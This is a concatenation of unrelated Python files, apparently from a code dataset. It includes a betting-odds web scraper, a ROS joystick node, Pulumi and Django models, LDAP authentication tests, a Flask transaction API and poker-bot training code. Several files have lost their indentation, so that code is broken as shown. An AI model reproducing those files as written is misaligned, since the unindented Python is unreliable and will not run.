# Initiate Browser
Browser.get(data[e])
# Wait 5 seconds
time.sleep(5)
# Index of target
index = -1
# Get index
soup = BeautifulSoup(Browser.page_source, 'html5lib')
box = len(soup.find_all('td', 'grid-table__td'))
for i in range(box):
if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG':
index = i
break
# Activate GGNG
if index > -1:
Browser.find_elements(By.CLASS_NAME,
'grid-table__td')[index].click()
# Wait 5 seconds
time.sleep(5)
# Scroll the page
height = int(Browser.execute_script(
'return document.body.scrollHeight'))
for i in range(1, height, 10):
Browser.execute_script("window.scrollTo(0, {});".format(i))
# Wait 5 seconds
time.sleep(5)
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
elem = soup.select('.sports-table > .table-f')
for each in elem:
# Compile
info = {}
home_team = each.find(
'div', 'sports-table__home').get_text().strip()
away_team = each.find(
'div', 'sports-table__away').get_text().strip()
info['category'] = e
info['match'] = home_team + ' vs ' + away_team
info['time'] = each.find('span').get_text().strip()
info['GG'] = each.find_all(
'li', 'sports-table__odds-item')[0].get_text().strip() or 0
info['NG'] = each.find_all(
'li', 'sports-table__odds-item')[1].get_text().strip() or 0
# Upload
odds.append(info)
else:
pass
continue
with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile:
json.dump(odds, outfile, indent=4)
Browser.quit()
# Double Chance and Single Chance
def DS_chance():
# Odds
s_odds = []
d_odds = []
# fetch links
with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:
global data
data = json.load(json_file)
for e in data:
# Initiate Browser
Browser.get(data[e])
# Wait 5 seconds
time.sleep(5)
# Scroll the page
height = int(Browser.execute_script(
'return document.body.scrollHeight'))
for i in range(1, height, 10):
Browser.execute_script("window.scrollTo(0, {});".format(i))
# # Wait 5 seconds
time.sleep(5)
# Parse HtmlDoc
soup = BeautifulSoup(Browser.page_source, "html5lib")
elem = soup.select('.sports-table > .table-f')
for each in elem:
# Compile
info_1 = {}
info_2 = {}
home_team = each.find(
'div', 'sports-table__home').get_text().strip()
away_team = each.find(
'div', 'sports-table__away').get_text().strip()
info_1['category'] = e
info_2['category'] = e
info_1['match'] = home_team + ' vs ' + away_team
info_2['match'] = home_team + ' vs ' + away_team
info_1['time'] = each.find('span').get_text().strip()
info_2['time'] = each.find('span').get_text().strip()
info_1['home'] = each.find_all(
'li', 'sports-table__odds-item')[0].get_text().strip() or 0
info_1['away'] = each.find_all(
'li', 'sports-table__odds-item')[2].get_text().strip() or 0
info_2['1X'] = each.find_all(
'li', 'sports-table__odds-item')[3].get_text().strip() or 0
info_2['2X'] = each.find_all(
'li', 'sports-table__odds-item')[5].get_text().strip() or 0
# Upload
s_odds.append(info_1)
d_odds.append(info_2)
with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile:
json.dump(s_odds, outfile, indent=4)
with open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile:
json.dump(d_odds, outfile, indent=4)
Browser.quit()
# getMenu()
# getLinks_Bet9ja()
DS_chance()
| 1.992188 | 2 |
src/hermesIII/src/xbox_360.py | hmalatini/hermes3 | 0 | 12794325 | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
toggle = False
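# Left stick (axes[0]/axes[1]) drives linear x/y and the right stick (axes[3]) drives yaw;
# button[4] (LB) acts as a dead-man switch: while held the command is published, and on
# release a single zero Twist is sent to stop the robot.
# (Axis/button indices assume the default Xbox 360 mapping of the ROS joy driver.)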
def callback(data):
global toggle
twist = Twist()
twist.linear.x = 1.5*data.axes[1]
twist.linear.y = -1.5*data.axes[0]
twist.angular.z = 1.5*data.axes[3]
if(data.buttons[4] == 1):
toggle = True
pub.publish(twist)
elif(toggle == True):
twist.linear.x = 0
twist.linear.y = 0
twist.angular.z = 0
pub.publish(twist)
toggle = False
# Intializes everything
def start():
    # publisher on "/cmd_vel" to drive the robot
global pub
pub = rospy.Publisher('/cmd_vel', Twist, queue_size=10)
# subscribed to joystick inputs on topic "joy"
rospy.Subscriber("joy", Joy, callback)
# starts the node
rospy.init_node('Xbox360Joy')
rospy.spin()
if __name__ == '__main__':
start()
| 2.71875 | 3 |
scripts/print_trace.py | master-coro/gantt-trampoline | 4 | 12794326 | <reponame>master-coro/gantt-trampoline
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
from lib.Tasks import TraceGenerator
import argparse
parser = argparse.ArgumentParser(description="Print trace from a Trampoline application.")
parser.add_argument('--trace_path', type=str, default='data/trace.json', help="Register the path to the trace json file")
parser.add_argument('--tpl_path', type=str, default='data/tpl_static_info.json', help="Register the path to the tpl static info json file")
args = parser.parse_args()
generator = TraceGenerator(args.tpl_path, args.trace_path)
generator.printTrace() | 2.40625 | 2 |
sdk/python/pulumi_aws/route53/zone_association.py | Charliekenney23/pulumi-aws | 0 | 12794327 | <reponame>Charliekenney23/pulumi-aws
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from .. import utilities, tables
class ZoneAssociation(pulumi.CustomResource):
vpc_id: pulumi.Output[str]
"""
The VPC to associate with the private hosted zone.
"""
vpc_region: pulumi.Output[str]
"""
The VPC's region. Defaults to the region of the AWS provider.
"""
zone_id: pulumi.Output[str]
"""
The private hosted zone to associate.
"""
def __init__(__self__, resource_name, opts=None, vpc_id=None, vpc_region=None, zone_id=None, __name__=None, __opts__=None):
"""
Manages a Route53 Hosted Zone VPC association. VPC associations can only be made on private zones.
> **NOTE:** Unless explicit association ordering is required (e.g. a separate cross-account association authorization), usage of this resource is not recommended. Use the `vpc` configuration blocks available within the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) instead.
> **NOTE:** Terraform provides both this standalone Zone VPC Association resource and exclusive VPC associations defined in-line in the [`aws_route53_zone` resource](https://www.terraform.io/docs/providers/aws/r/route53_zone.html) via `vpc` configuration blocks. At this time, you cannot use those in-line VPC associations in conjunction with this resource and the same zone ID otherwise it will cause a perpetual difference in plan output. You can optionally use the generic Terraform resource [lifecycle configuration block](https://www.terraform.io/docs/configuration/resources.html#lifecycle) with `ignore_changes` in the `aws_route53_zone` resource to manage additional associations via this resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] vpc_id: The VPC to associate with the private hosted zone.
:param pulumi.Input[str] vpc_region: The VPC's region. Defaults to the region of the AWS provider.
:param pulumi.Input[str] zone_id: The private hosted zone to associate.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if not resource_name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(resource_name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if vpc_id is None:
raise TypeError("Missing required property 'vpc_id'")
__props__['vpc_id'] = vpc_id
__props__['vpc_region'] = vpc_region
if zone_id is None:
raise TypeError("Missing required property 'zone_id'")
__props__['zone_id'] = zone_id
super(ZoneAssociation, __self__).__init__(
'aws:route53/zoneAssociation:ZoneAssociation',
resource_name,
__props__,
opts)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 1.875 | 2 |
codecast/0/dwpage.py | wsricardo/makvincis | 0 | 12794328 | <gh_stars>0
# download web page
import urllib.request as request
url = "https://en.wikipedia.org/wiki/Main_Page"
data = request.urlopen(url).read()
print(data.decode("utf8"))
# Save html file
with open("data.html","w") as fl:
fl.write(data.decode("utf8"))
print("\n\nFinishh")
print("File saved with name (current directory): data.html\n")
| 3.28125 | 3 |
dl/gym_test.py | Nemandza82/g5-poker-bot | 4 | 12794329 | import time
from load_gym import load_gym
import action_helpers as ah
import dl_model_1 as m1
def append_winnings(all_states, all_winnings, winnings):
while len(all_winnings) < len(all_states):
id = len(all_winnings)
player_id = all_states[id].player_to_act
all_winnings.append(winnings[player_id])
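# play_hand runs one heads-up hand between model0 and model1. With what_if_play enabled, a fold is replaced by a randomized non-fold action so the hand continues (to collect more training data), while the saldo at the moment of the first fold is kept as the reported hand result.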
def play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play):
state = gym.startHand()
all_states = []
all_actions = []
all_winnings = []
hand_saldo = []
while state.status != "hand_finished":
if state.player_to_act == 0:
[action, action_ind], ammount = m1.calculate_action(model0, state, rnd_odds0)
else:
[action, action_ind], ammount = m1.calculate_action(model1, state, rnd_odds1)
is_fake_action = False
# In case of fold we can continue playing...
if (action == ah.ACTION_FOLD[0]) and what_if_play:
print("Player:", state.player_to_act, "wanted to fold - randomizing action ******")
winn = [0, 0]
winn[state.player_to_act] = 0
winn[state.other_player_ind] = state.pot_size
print("Winnings:", winn)
append_winnings(all_states, all_winnings, winn)
if len(hand_saldo) == 0:
hand_saldo = [0, 0]
hand_saldo[state.player_to_act] = state.stack_size - state.start_stack_size
hand_saldo[state.other_player_ind] = -hand_saldo[state.player_to_act]
print("Hand saldo at the moment of first fold:", hand_saldo)
# randomize new action and continue playing...
[action, action_ind], ammount = ah.randomize_action(state.pot_size, state.ammount_to_call, state.stack_size, never_fold=True)
is_fake_action = True
if state.player_to_act == 0:
all_states.append(state)
all_actions.append(action_ind)
print("Calculated action:", action, ammount)
state = gym.act(action, ammount, is_fake_action)
append_winnings(all_states, all_winnings, state.winnings)
print("All winings:", all_winnings)
if len(hand_saldo) == 0:
hand_saldo = [state.saldo[0], state.saldo[1]]
print("Taking state saldo ----")
print("Final hand saldo:", [state.saldo[0], state.saldo[1]])
print("Returned hand saldo:", hand_saldo)
return all_states, all_actions, all_winnings, hand_saldo
def play_manu_hands(gym, model0, rnd_odds0, model1, rnd_odds1, num_hands, what_if_play):
all_states = []
all_actions = []
all_winnings = []
total_saldo = [0, 0]
for i in range(num_hands):
print("")
print("Hand: ", i)
states, actions, winnings, saldo = play_hand(gym, model0, rnd_odds0, model1, rnd_odds1, what_if_play)
total_saldo[0] += saldo[0]
total_saldo[1] += saldo[1]
print("Avg saldo per hand:", round(total_saldo[0] / (i + 1), 2), ",", round(total_saldo[1] / (i + 1), 2))
for st in states:
all_states.append(st)
for act in actions:
all_actions.append(act)
for winn in winnings:
all_winnings.append(winn)
total_saldo[0] /= num_hands
total_saldo[1] /= num_hands
print("")
print("Bot 0 score: ", total_saldo[0], "per hand")
print("Bot 1 score: ", total_saldo[1], "per hand")
print("")
print("Colected ", len(all_states), " data pairs for training.")
return all_states, all_actions, all_winnings, total_saldo
def load_opp_models(model_paths, rnd_odds):
models = []
opp_names = []
for i in range(len(model_paths)):
opp_model = m1.create_model_1()
opp_model.load_weights(model_paths[i])
models.append(opp_model)
if rnd_odds[i] == 100:
opp_names.append("random")
else:
opp_names.append(model_paths[i])
return models, rnd_odds, opp_names
gym = load_gym()
f = open("log.txt", "w")
training_model = m1.create_model_1()
training_model.load_weights("weights0012.h5")
training_model_rnd_odds = 5
#opp_models, rnd_odds, opp_name = load_opp_models(["model_1_lvl_00.h5", "model_1_lvl_00.h5", "model_1_lvl_01.h5", "model_1_lvl_02.h5"], [100, 0, 0, 0])
opp_models, rnd_odds, opp_name = load_opp_models(["model_1_lvl_01.h5"], [0])
num_iters = 50000
num_hands = 4000
what_if_play = True
do_training = True
training_epochs = 30
# Leveling params
saldo_limit_for_next_lvl = 200
next_level = 4
max_opp_models = 20
for i in range(num_iters):
print("\nIteration:", i, "\n", file=f)
f.flush()
states = []
actions = []
winnings = []
#saldos = []
go_to_next_level = True
# Play against opp models
for j in range(len(opp_models)):
print("Playing vs", opp_name[j], file=f)
f.flush()
start_time = time.time()
st, act, winn, saldo = play_manu_hands(gym, training_model, training_model_rnd_odds, opp_models[j], rnd_odds[j], num_hands=num_hands, what_if_play=what_if_play)
elapsed_time = time.time() - start_time
states.append(st)
actions.append(act)
winnings.append(winn)
#saldos.append(saldo)
if saldo[0] < saldo_limit_for_next_lvl:
go_to_next_level = False
print("Played", num_hands, "hands in", round(elapsed_time), "seconds", round(1000 * elapsed_time / num_hands), "ms per hand", file=f)
print("Saldo vs", opp_name[j], saldo, "\n", file=f)
f.flush()
if do_training and go_to_next_level:
file_name = "model_1_lvl_" + str(next_level).zfill(2) + ".h5"
print("Went to next level:", file_name, "\n", file=f)
f.flush()
training_model.save_weights(file_name)
next_level += 1
# Push training model to opponent models
opp_models.append(training_model)
rnd_odds.append(0)
opp_name.append(file_name)
if len(opp_models) > max_opp_models:
opp_models.pop(0)
rnd_odds.pop(0)
opp_name.pop(0)
# Make new training model. Continue where last one left off
training_model = m1.create_model_1()
training_model.load_weights(file_name)
if do_training:
print("Now training\n", file=f)
f.flush()
for j in range(len(states)):
real_epochs = training_epochs
#if (saldos[j][0] < 0):
# real_epochs *= 2
start_time = time.time()
m1.train_model(training_model, states[j], actions[j], winnings[j], batch_size=128, validation_split=0.1, epochs=real_epochs)
elapsed_time = time.time() - start_time
print("Trained", real_epochs, "epochs in", round(elapsed_time), "seconds", round(elapsed_time / real_epochs, 2), "seconds per epoch", file=f)
f.flush()
file_name = "weights" + str(i).zfill(4) + ".h5"
training_model.save_weights(file_name)
print("\nSaved weights:", file_name, file=f)
f.flush()
f.close() | 2.609375 | 3 |
project/migrations/0004_auto_20191027_2049.py | Belie06Loryn/Project_Post | 0 | 12794330 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-10-27 18:49
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('project', '0003_voting'),
]
operations = [
migrations.RemoveField(
model_name='foto',
name='category',
),
migrations.RemoveField(
model_name='foto',
name='designer',
),
migrations.RemoveField(
model_name='foto',
name='tags',
),
migrations.AddField(
model_name='foto',
name='profiles',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='project.Profile'),
),
]
| 1.554688 | 2 |
topcoder/solutions/SortEstimate.py | 0x8b/HackerRank | 3 | 12794331 | <reponame>0x8b/HackerRank<gh_stars>1-10
#!/usr/bin/env python
import math
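# Binary-search the n for which c * n * log2(n) equals the given time, narrowing the interval [1, 2e9] until it is below 1e-9.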
def how_many(c, time):
assert 1 <= c <= 100
assert 1 <= time <= 2000000000
left, right = 1, 2000000000
while not right - left < 1e-9:
n = (left + right) / 2
if n * math.log(n, 2) >= time / c:
right = n
else:
left = n
return left
assert abs(how_many(1, 8) - 4) < 1e-9
assert abs(how_many(2, 16) - 4) < 1e-9
assert abs(how_many(37, 12392342) - 23104.999312341137) < 1e-9
assert abs(how_many(1, 2000000000) - 7.637495090348122e7) < 1e-9
| 3.03125 | 3 |
tests/test_vembrane.py | FelixMoelder/vembrane | 0 | 12794332 | from pathlib import Path
import os
from pysam import VariantFile
import pytest
import yaml
from vembrane import errors
from vembrane import __version__, filter_vcf
CASES = Path(__file__).parent.joinpath("testcases")
def test_version():
assert __version__ == "0.1.0"
@pytest.mark.parametrize(
"testcase", [d for d in os.listdir(CASES) if not d.startswith(".")]
)
def test_filter(testcase):
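    # Each testcase directory provides a config.yaml plus test.vcf, and either an expected.vcf or a "raises" entry naming the expected vembrane error.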
path = CASES.joinpath(testcase)
with open(path.joinpath("config.yaml")) as config_fp:
config = yaml.load(config_fp, Loader=yaml.FullLoader)
vcf = VariantFile(path.joinpath("test.vcf"))
if "raises" in config:
exception = getattr(errors, config["raises"])
from vembrane import check_filter_expression
with pytest.raises(exception):
# FIXME we have to explicitly check the filter expression here
# until we change from calling filter_vcf
# to actually invoking vembrane.main
check_filter_expression(config.get("filter_expression"))
list(
filter_vcf(
vcf,
config.get("filter_expression"),
config.get("ann_key", "ANN"),
config.get("keep_unmatched", False),
)
)
else:
expected = list(VariantFile(path.joinpath("expected.vcf")))
result = list(
filter_vcf(
vcf,
config.get("filter_expression"),
config.get("ann_key", "ANN"),
config.get("keep_unmatched", False),
)
)
assert result == expected
| 2.03125 | 2 |
tests/test_authLdap.py | kakwa/dnscherry | 9 | 12794333 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import with_statement
from __future__ import unicode_literals
import pytest
import sys
from sets import Set
from dnscherry.auth.modLdap import Auth, CaFileDontExist
import cherrypy
import logging
import ldap
cfg = {
'auth.ldap.module': 'dnscherry.backend.ldap',
'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org',
'auth.ldap.userdn': 'ou=People,dc=example,dc=org',
'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org',
'auth.ldap.bindpassword': 'password',
'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389',
'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem',
'auth.ldap.starttls': 'off',
'auth.ldap.checkcert': 'off',
'auth.ldap.user.filter.tmpl': '(uid=%(login)s)',
'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)',
'auth.ldap.dn_user_attr': 'uid',
'auth.ldap.group_attr.member': "%(dn)s",
'auth.ldap.timeout': 10,
}
def syslog_error(msg='', context='',
severity=logging.INFO, traceback=False):
pass
cherrypy.log.error = syslog_error
attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn']
class TestError(object):
def testNominal(self):
inv = Auth(cfg, cherrypy.log)
return True
def testConnectSSLNoCheck(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'off'
inv = Auth(cfg2, cherrypy.log)
ldap = inv._connect()
ldap.simple_bind_s(inv.binddn, inv.bindpassword)
def testConnect(self):
inv = Auth(cfg, cherrypy.log)
ldap = inv._connect()
ldap.simple_bind_s(inv.binddn, inv.bindpassword)
return True
def testConnectSSL(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'on'
inv = Auth(cfg2, cherrypy.log)
ldap = inv._connect()
ldap.simple_bind_s(inv.binddn, inv.bindpassword)
    def testLdapUnavailable(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://notaldap:636'
cfg2['checkcert'] = 'on'
inv = Auth(cfg2, cherrypy.log)
try:
ldapc = inv._connect()
ldapc.simple_bind_s(inv.binddn, inv.bindpassword)
except ldap.SERVER_DOWN as e:
return
def testMissingCA(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'on'
cfg2['ca'] = './test/cfg/not_a_ca.crt'
try:
inv = Auth(cfg2, cherrypy.log)
ldapc = inv._connect()
except CaFileDontExist as e:
return
def testConnectSSLWrongCA(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'
cfg2['checkcert'] = 'on'
inv = Auth(cfg2, cherrypy.log)
ldapc = inv._connect()
try:
ldapc.simple_bind_s(inv.binddn, inv.bindpassword)
except ldap.SERVER_DOWN as e:
assert e[0]['info'] == 'TLS: hostname does not match CN in peer certificate'
def testConnectStartTLS(self):
cfg2 = cfg.copy()
cfg2['uri'] = 'ldap://ldap.dnscherry.org:390'
cfg2['checkcert'] = 'off'
cfg2['starttls'] = 'on'
cfg2['ca'] = './test/cfg/ca.crt'
inv = Auth(cfg2, cherrypy.log)
ldapc = inv._connect()
ldapc.simple_bind_s(inv.binddn, inv.bindpassword)
def testAuthSuccess(self):
inv = Auth(cfg, cherrypy.log)
ret = inv.check_credentials('jwatson', '<PASSWORD>')
assert ret == True
def testAuthFailure(self):
inv = Auth(cfg, cherrypy.log)
res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>')
assert res == False
def testMissingParam(self):
cfg2 = {}
return True
try:
inv = Auth(cfg2, cherrypy.log)
except MissingKey:
return
| 1.84375 | 2 |
fake-switches/run_switch.py | CC-Digital-Innovation/devops-workshop | 0 | 12794334 | <reponame>CC-Digital-Innovation/devops-workshop
from twisted.internet import reactor
from fake_switches.switch_configuration import SwitchConfiguration, Port
from fake_switches.transports.ssh_service import SwitchSshService
from fake_switches.dell.dell_core import DellSwitchCore
class CustomSwitchConfiguration(SwitchConfiguration):
def __init__(self, *args, **kwargs):
super(CustomSwitchConfiguration, self).__init__(objects_overrides={"Port": CustomPort}, *args, **kwargs)
class CustomPort(Port):
def __init__(self, name):
self._access_vlan = None
super(CustomPort, self).__init__(name)
@property
def access_vlan(self):
return self._access_vlan
@access_vlan.setter
def access_vlan(self, value):
if self._access_vlan != value:
self._access_vlan = value
print("This could add vlan to eth0")
if __name__ == '__main__':
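    # Expose a fake Dell switch over SSH on 127.0.0.1:11001; the login credentials come from the fake_switches defaults.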
ssh_service = SwitchSshService(
ip="127.0.0.1",
port=11001,
switch_core=DellSwitchCore(CustomSwitchConfiguration("127.0.0.1",
"NEXT-TEST",
ports=[
CustomPort("Eth1/1"),
CustomPort("Eth1/2"),
CustomPort("Eth1/3"),
CustomPort("Eth1/4"),
CustomPort("Eth1/5"),
CustomPort("Eth1/6"),
CustomPort("Eth1/7"),
CustomPort("Eth1/8"),
CustomPort("Eth1/9"),
CustomPort("Eth1/10"),
CustomPort("Eth1/11"),
CustomPort("Eth1/12"),
CustomPort("Eth1/13"),
CustomPort("Eth1/14"),
CustomPort("Eth1/15"),
CustomPort("Eth1/16"),
CustomPort("Eth1/17"),
CustomPort("Eth1/18"),
CustomPort("Eth1/19"),
CustomPort("Eth1/20"),
CustomPort("Eth1/21"),
CustomPort("Eth1/22"),
CustomPort("Eth1/23"),
CustomPort("Eth1/24"),
CustomPort("Eth1/25"),
CustomPort("Eth1/26"),
CustomPort("Eth1/27"),
CustomPort("Eth1/28"),
CustomPort("Eth1/29"),
CustomPort("Eth1/30"),
CustomPort("Eth1/31"),
CustomPort("Eth1/32"),
CustomPort("mgmt0"),
CustomPort("Lo0"),
])))
ssh_service.hook_to_reactor(reactor)
reactor.run() | 2.390625 | 2 |
design/server/api/Transaction.py | smdsbz/database-experiment | 0 | 12794335 | <gh_stars>0
# -*- coding: utf-8 -*-
from flask import request
from flask_restful import Resource
from flask_restful import abort
import decimal as D
from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao
from db import ShiftsDao, VIPTransRecordDao
from .Auth import auth
merch_dao = MerchandiseDao()
trans_dao = TransactionDao()
detail_dao = TransDetailDao()
employ_dao = EmployeeDao()
shift_dao = ShiftsDao()
viprec_dao = VIPTransRecordDao()
class TransactionApi(Resource):
@auth.login_required
def get(self, start: int, count: int):
'''
Arguments
---------
start: int
count: int
Maximum rows to return. If <= 0, return all rows.
'''
sql = f'''
select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`)
from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D
where T.`id` >= %s and T.`cashier` = E.`id` and T.`id` = D.`trans_id`
group by T.`id`
order by T.`time` desc
'''
if count > 0:
sql += ' limit %s'
value = (start, count)
else:
value = (start,)
with trans_dao._conn.cursor() as cur:
try:
cur.execute(sql, value)
result = [row for row in cur]
trans_dao._conn.commit()
except Exception as e:
trans_dao._conn.rollback()
abort(500, str(e))
return [
{
'trans_id': row[0],
'time': row[1].strftime('%Y-%m-%d %H:%M:%S'),
'cashier_id': row[2],
'cashier_login': row[3],
'sum': float(row[4])
}
for row in result
], 200
@auth.login_required
def post(self):
'''
JSON data format:
{
'vip_id': vip_id or None
'cashier': cashier_id: int,
'trans': [
[merch_id: int, actual_price: float, count: int],
...
]
}
'''
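        # Flow: create the transaction master record, decrement stock per item, write the detail rows, compute the total, then update VIP and shift records; any failure rolls the whole unit of work back.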
data = request.get_json()
if 'cashier' not in data or 'trans' not in data:
return {
'reason': 'cashier, trans data must be given!'
}, 406
cashier, trans_items = data['cashier'], data['trans']
vip_id = data['vip_id'] if 'vip_id' in data else None
if not employ_dao.has_id(cashier):
return {
'reason': f'Cashier ID {cashier} is illegal!'
}, 406
conn = trans_dao._conn
with conn.cursor() as cur:
try:
trans_id = trans_dao.start(cashier, cur)
# create transaction master record
if trans_id < 0:
conn.rollback()
abort(500, message='Failed to start transaction!')
# consume stored merchandise
for merch_id, _, count in trans_items:
ret = merch_dao.consume(merch_id, count, cur)
if ret:
conn.rollback()
if ret == -1 or ret == 3:
return {
'merch_id': merch_id,
'reason': 'Illegal ID'
}, 406
if ret == 1:
return {
'merch_id': merch_id,
'reason': 'Not enough in storage'
}, 406
if ret == 2:
return {
'merch_id': merch_id,
'reason': 'UPDATE finished with error'
}, 406
abort(500, message=f'Unknown error at consume(): {ret}.')
# fill transaction details
if detail_dao.fill(trans_id, trans_items, cur):
conn.rollback()
abort(500, message='Error occured while filling '
'transaction details!')
# get sum of current transaction
trans_sum = detail_dao.get_sum(trans_id, cur)
if trans_sum is None:
conn.rollback()
abort(500)
# update VIP card info
if vip_id is not None:
ret = viprec_dao.transact_cb(vip_id, trans_sum, cur)
if ret != 0 and ret != 1:
conn.rollback()
if ret == -1:
return {
'vip_id': vip_id,
'reason': 'Invalid VIP ID'
}, 406
if ret == 2:
return {
'vip_id': vip_id,
'reason': 'VIP card timeout'
}, 406
abort(500, message='Unknown error at VIPTransRecordDao'
f'.transact_db(): {ret}.')
# update shifts info
if shift_dao.transact_cb(cashier, trans_sum, cur):
conn.rollback()
return {
'reason': f'Employee {cashier} not logged in!'
}, 406
conn.commit()
except Exception as e:
conn.rollback()
abort(500, message=str(e))
return '', 200
class TransDetailApi(Resource):
@auth.login_required
def get(self, trans_id: int):
sql = f'''
select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price,
D.`count`
from `{merch_dao._table}` as M, `{detail_dao._table}` as D
where D.`trans_id` = %s and M.`id` = D.`merch_id`
'''
value = (trans_id,)
with detail_dao._conn.cursor() as cur:
try:
cur.execute(sql, value)
ret = [row for row in cur]
detail_dao._conn.commit()
except Exception as e:
detail_dao._conn.rollback()
abort(500, message=str(e))
return [
{
'merch_id': row[0],
'name': row[1],
'actual_price': float(row[2]),
'orig_price': float(row[3]),
'count': row[4]
}
for row in ret
]
| 2.390625 | 2 |
doge/filter/__init__.py | zhu327/doge | 163 | 12794336 | from typing import Any
from gevent.monkey import patch_thread # type: ignore
from doge.common.doge import Executer, Request, Response
from doge.common.utils import import_string
patch_thread()
class BaseFilter(Executer):
def __init__(self, context: Any, _next: Executer):
self.next = _next
def execute(self, req: Request) -> Response:
return self.next.execute(req)
class FilterChain:
def __init__(self, context: Any):
self.context = context
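    # Wrap the executer with each filter class listed in the url "filters" param, in reverse order, so the first configured filter is the outermost and runs first.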
def then(self, executer: Executer) -> Executer:
filters = self.context.url.get_param("filters", [])
for cls in reversed([import_string(f) for f in filters]):
executer = cls(self.context, executer)
return executer
| 2.046875 | 2 |
solution/string/no_58_2_left_rotate.py | LibertyDream/algorithm_data_structure | 0 | 12794337 | '''Interview Question 58-2: Left-rotate a string
A left rotation moves a number of leading characters of a string to its tail.
Define a function that implements this left-rotation operation on a string.
---------------
input: abcdefg 2
output: cdefgab
'''
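# Classic three-reversal rotation: reverse the first n characters, reverse the rest, then reverse the whole string in place.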
def left_rotate(string, n):
if string is None or len(string) == 0:
return None
if n < 0 or n >len(string):
return None
str_arr = [x for x in string]
begin = 0
div = n - 1
end = len(string) - 1
__reverse(str_arr, begin, div)
__reverse(str_arr, div+1, end)
__reverse(str_arr, begin, end)
return ''.join(str_arr)
def __reverse(str_arr, begin, end):
while begin < end:
str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin]
begin += 1
end -= 1
if __name__ == "__main__":
string = 'abcdefg'
rotate = 2
print('"%s" left rotate %d: %s' % (string, rotate, left_rotate(string, rotate))) | 3.859375 | 4 |
Projects/Online Workouts/w3resource/Collections/program-9.py | ivenpoker/Python-Projects | 1 | 12794338 | #!/usr/bin/env python3
############################################################################################
# #
# Program purpose: Adds more number of elements to a deque object from an iterable #
# object. #
# Program Author : <NAME> <<EMAIL>> #
# Creation Date : December 27, 2019 #
# #
############################################################################################
from random import randint
from collections import deque
def create_random_deque(low: int, high: int, size: int) -> deque:
if size < 0:
raise ValueError(f'Invalid size ({size}) for new deque')
return deque([randint(low, high) for _ in range(size)])
def add_nums_to_deque(source_deque: deque, max_ext: int) -> None:
if max_ext < 0:
raise ValueError(f'Invalid max size ({max_ext}) for deque')
return source_deque.extend([randint(0, max_ext) for _ in range(max_ext)])
if __name__ == "__main__":
new_deque = create_random_deque(low=0, high=20, size=5)
print(f'New deque: {new_deque}')
# Extend deque with 5 random data.
add_nums_to_deque(source_deque=new_deque, max_ext=5)
print(f'Extended deque: {new_deque}')
| 3.90625 | 4 |
parts/app/partsnumber/models.py | heljhumenad/parts-arrival | 3 | 12794339 | from django.db import models
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from parts.core.managers import AbstractUpdateViewManager
from parts.core.models import TimeStampModel
class PartsNumber(AbstractUpdateViewManager, TimeStampModel):
SOURCE_CODE = (
("01", "Nissan Japan-01"),
("02", "Nissan Taiwan-02"),
("05", "Nissan Thailand-05"),
("08", "Nissan Indonesia-08"),
)
PARTNUMBER_STATUS = (
("Active", "Active"),
("Depcreated", "Depcreated"),
("Obsolete", "Obsolete"),
("Deactivated", "Deactivated"),
)
partnumber = models.CharField(
max_length=200,
verbose_name=_("Parts Number")
)
source_code = models.CharField(
max_length=200,
verbose_name=_("Source Code"),
choices=SOURCE_CODE
)
bar_code = models.CharField(
max_length=200,
verbose_name=_("Barcode No.")
)
